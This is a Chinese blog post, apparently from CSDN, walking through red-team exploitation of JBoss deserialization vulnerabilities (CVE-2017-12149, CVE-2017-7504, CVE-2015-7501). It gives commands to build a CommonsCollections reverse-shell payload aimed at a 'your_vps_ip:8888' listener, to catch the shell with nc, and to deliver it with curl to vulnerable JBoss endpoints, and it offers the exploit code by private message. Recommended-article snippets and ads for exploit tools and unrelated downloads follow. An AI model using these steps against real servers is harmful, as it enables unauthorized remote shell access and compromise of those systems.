java反序列化漏洞利用工具_红队攻击之利用jboss反序列化获取目标权限漏洞梳理

最新推荐文章于 2023-02-20 11:42:01 发布
最新推荐文章于 2023-02-20 11:42:01 发布
阅读量667 收藏 1
点赞数
文章标签: java反序列化漏洞利用工具

JBOSS AS 6.x反序列化(CVE-2017-12149)

漏洞影响5.x和6.x版本的JBOSSAS

1、检测目录 192.168.28.138:60899/invoker/readonly

30ff0a8e294e99aef5e1ee0be22906a0.png

2、Linux下编译java代码,然后生成反弹shell序列化文件,内容较长,可私信“jboss”获取代码

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.javajava -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap your_vps_ip:8888
e57da2ba1280c4a8c993155961203469.png

3、nc监听上述反弹shell端口

12bf7aaf300ac15f01807dc3681754a1.png

4、向目标发送生成的序列化文件即可收到反弹shell

curl http://192.168.28.138:60899/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
9149fc0725b8b224eb33b7150d2a1d33.png

5、接收反弹shell

9f01f1f75a05e3d423144380207847bc.png

JBOSS AS 4.x JbossMQ JMS反序列化(CVE-2017-7504)

影响范围:JBoss AS 4.x及之前版本。跟CVE-2017-12149使用同样的payload

1、检测目录192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet

ceb546e4d936bbfeece117d3cdc15c18.png

2、nc监听

faeb89f85d6e5c5c63110bf01df3f4b5.png

3、发送payload getshell

curl http://192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
fcdefe5bbfb4edeeb309bc29d73ee7aa.png

4、接收反弹shell

2ee3612ddf3c528d9c473d21f3f27c42.png

JBOSS Java反序列化(CVE-2015-7501)

也就是15年出来的Java反序列化漏洞

e0b30f54923e5977399a6e738493a94d.png

1、检测目录192.168.28.138:57287/invoker/JMXInvokerServlet

2、直接利用Java反序列化工具即可

b2a7889c3a6f0c74922de81df692cac2.png

私信“jboss”获取利用代码及工具。

weixin_39963287
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java安全 反序列化(二)
sechelper的博客
12-07 600
java反射,CC6链源码分析,LazyMap利用连,ysoserial工具
红队专题-漏洞挖掘代码审计-RCE-反序列化
aming小老弟
03-14 1523
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
网络安全【漏洞安全】反序列化漏洞深入分析
kali_Ma的博客
10-10 392
反序列化漏洞深入分析
红队中的一些重点系统漏洞整理(通用的一些漏洞
qq_50854662的博客
02-20 775
红队中的一些重点系统漏洞整理(通用的一些漏洞
用 Goby 通过反序列化漏洞一键打入内存马【利用篇】
m0_46699477的博客
01-16 1102
Goby 使用者无需任何配置,就可以一键打入内存马。
红队中易被攻击的一些重点系统漏洞整理(精华)
文公子的博客
01-20 2407
红队中易被攻击的一些重点系统漏洞整理 一、OA系统 泛微(Weaver-Ecology-OA) ???? 泛微OA E-cology RCE(CNVD-2019-32204) - 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ???? 泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ???? 泛微ecology OA数据库配置信息泄露 htt
红队中易被攻击的一些重点系统漏洞整理
zhangge3663的博客
12-10 2088
一、OA系统 泛微(Weaver-Ecology-OA) ????泛微OA E-cology RCE(CNVD-2019-32204)- 影响版本7.0/8.0/8.1/9.0 https://xz.aliyun.com/t/6560 ????泛微OA WorkflowCenterTreeData接口注入(限oracle数据库) https://zhuanlan.zhihu.com/p/86082614 ????泛微ecology OA数据库配置信息泄露 https://www.cnblogs
Notes Fifteenth Day-渗透攻击-红队-内部信息搜集
热门推荐
qq_34801745的博客
10-01 1万+
** Notes Fifteenth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-10-1 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
Notes Twelfth Day-渗透攻击-红队-命令与控制
qq_34801745的博客
09-28 7676
** Notes Twelfth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-28 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好
Notes Ninth Day-渗透攻击-红队-打入内网
qq_34801745的博客
09-25 8092
** Notes Ninth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-25 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞利用工具可能包含了一系列的payload(攻击载荷)和脚本,这些可以用来模拟攻击,检查JBOSS和WebLogic是否容易受到反序列化攻击。其中,JBOSS_EXP.jar可能是用于攻击JBOSS服务器的特定工具。 关于...
java反序列化漏洞利用工具Jboss&WebLogic;.rar
07-23
jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出...
java反序列化漏洞利用工具WebLogicExploit_weblogic图形化漏洞利用工具
09-01
jboss利用里添加一键getshell功能,利用的是jboss的热部署功能,直接部署一个war包,一键返回一个菜刀shell 3. 反弹shell部分更完美,不再加载远程war包,直接发包完成反弹。 4. jboss回显执行命令部分利用异常抛出...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
智慧校园音视频系统整体解决方案-1PPT(24页).pptx
07-28
智慧校园整体解决方案是响应国家教育信息化政策,结合教育改革和技术创新的产物。该方案以物联网、大数据、人工智能和移动互联技术为基础,旨在打造一个安全、高效、互动且环保的教育环境。方案强调从数字化校园向智慧校园的转变,通过自动数据采集、智能分析和按需服务,实现校园业务的智能化管理。 方案的总体设计原则包括应用至上、分层设计和互联互通,确保系统能够满足不同用户角色的需求,并实现数据和资源的整合与共享。框架设计涵盖了校园安全、管理、教学、环境等多个方面,构建了一个全面的校园应用生态系统。这包括智慧安全系统、校园身份识别、智能排课及选课系统、智慧学习系统、精品录播教室方案等,以支持个性化学习和教学评估。 建设内容突出了智慧安全和智慧管理的重要性。智慧安全管理通过分布式录播系统和紧急预案一键启动功能,增强校园安全预警和事件响应能力。智慧管理系统则利用物联网技术,实现人员和设备的智能管理,提高校园运营效率。 智慧教学部分,方案提供了智慧学习系统和精品录播教室方案,支持专业级学习硬件和智能化网络管理,促进个性化学习和教学资源的高效利用。同时,教学质量评估中心和资源应用平台的建设,旨在提升教学评估的科学性和教育资源的共享性。 智慧环境建设则侧重于基于物联网的设备管理,通过智慧教室管理系统实现教室环境的智能控制和能效管理,打造绿色、节能的校园环境。电子班牌和校园信息发布系统的建设,将作为智慧校园的核心和入口,提供教务、一卡通、图书馆等系统的集成信息。 总体而言,智慧校园整体解决方案通过集成先进技术,不仅提升了校园的信息化水平,而且优化了教学和管理流程,为学生、教师和家长提供了更加便捷、个性化的教育体验。
基于Springboot和Vue的铁路订票管理系统源码 铁路订票管理系统代码(高分优秀毕业设计)
07-28
铁路订票管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
四足机器人 (2).pdf
最新发布
07-28
四足机器人 (2)
IT运维流程-变更管理流程设计说明书.pdf
07-28
IT运维流程-变更管理流程设计说明书.pdf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值